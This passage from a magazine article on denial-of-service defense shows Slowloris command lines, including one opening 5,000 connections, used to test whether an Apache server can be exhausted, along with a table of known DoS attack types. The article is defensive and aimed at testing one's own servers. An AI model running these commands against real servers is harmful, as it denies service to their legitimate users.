Denial of service defense

Putting On the Brakes

Bombs Away

To carry out an initial test with Slowloris, type the command

python3 slowloris.py example.com

Don't forget to change the domain name from example.com to the domain you want to test in your own environment. Of course, you can customize Slowloris with a number of parameters (e.g., relating to the test intensity and type of attack). For example, you can change the number of open connections or the duration between transmitting individual headers and other factors. As you can see, you can work around the defenses deployed on the servers – provided you know the values you set on the servers.

For example, if you want to launch an attack with 5,000 connections, you would call Slowloris with the -s 5000 option. The following call launches an attack against a TLS-protected server on port 443:

python3 slowloris.py example.com -s 5000 --https -p 8443

You might notice a remarkable effect of the Apache configuration at this point: If you have not changed any settings there, you should not be able to open even 1,000 simultaneous connections, because that is the default value for the available connections in Apache. The number of available processes per threads and, in turn, the number of available connections are used up before you reach this limit, which means that legitimate users can no longer reliably connect to the web server until you terminate the above command.

Conclusions

The Slowloris example in this article shows how easy it is to carry out a denial-of-service attack (Table 1) and how you can protect your web server against this attack. If you discover a vulnerability in one of your web servers, no matter how small the effect might seem at first glance, you need to define and roll out possible countermeasures without delay.

Table 1

Known Denial-of-Service Attacks

Type of Attack Description Resource consumption DoS/DDoS*
Volume-based attacks Flood the network with traffic to overload the bandwidth. Network bandwidth DDoS
UDP/ICMP flooding Send a large number of UDP/ICMP packets to overload the target system. Network bandwidth, CPU DDoS
SYN flooding Send a large number of SYN requests without completing the handshake to block connections. Network resources, memory DDoS
Ping of death Send oversized or fragmented ping packets that cause the target system to crash. Network bandwidth, memory DoS
Slowloris Keep HTTP connections open because of slow transmission of header data to reach the maximum connection limit. Server connections, memory DoS
HTTP slow POST/RUDY Send very slow POST data to bind server resources. Server connections, CPU, RAM DoS
Reflection Send requests to third-party servers with a spoofed sender address so that the responses flood the victim. Network bandwidth DDoS
Amplification Exploit open servers (DNS, NTP, SSDP) to flood the victim's bandwidth with large volumes of data. Network bandwidth DDoS
*DoS, denial of service; DDoS, distributed denial of service; UDP, User Datagram Protocol; ICMP, Internet Control Message Protocol; RUDY, R U dead yet; DNS, domain name system; NTP, Network Time Protocol; SSDP, Simple Service Discovery Protocol.

The Author

Dr. Matthias Wübbeling is an IT security enthusiast, scientist, author, consultant, and speaker. As a lecturer at the University of Bonn in Germany and researcher at Fraunhofer FKIE, he works on projects in network security, IT security awareness, and protection against account takeover and identity theft. He is the CEO of the university spin-off Identeco, which keeps a leaked-identity database to protect employee and customer accounts against identity fraud. As a practitioner, he supports the German Informatics Society (GI), administrating computer systems and service back ends. He has published more than 100 articles on IT security and administration.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy ADMIN Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

comments powered by Disqus
Subscribe to our ADMIN Newsletters
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs



Support Our Work

ADMIN content is made possible with support from readers like you. Please consider contributing when you've found an article to be beneficial.

Learn More”>
	</a>

<hr>		    
			</div>
		    		</div>

		<div class=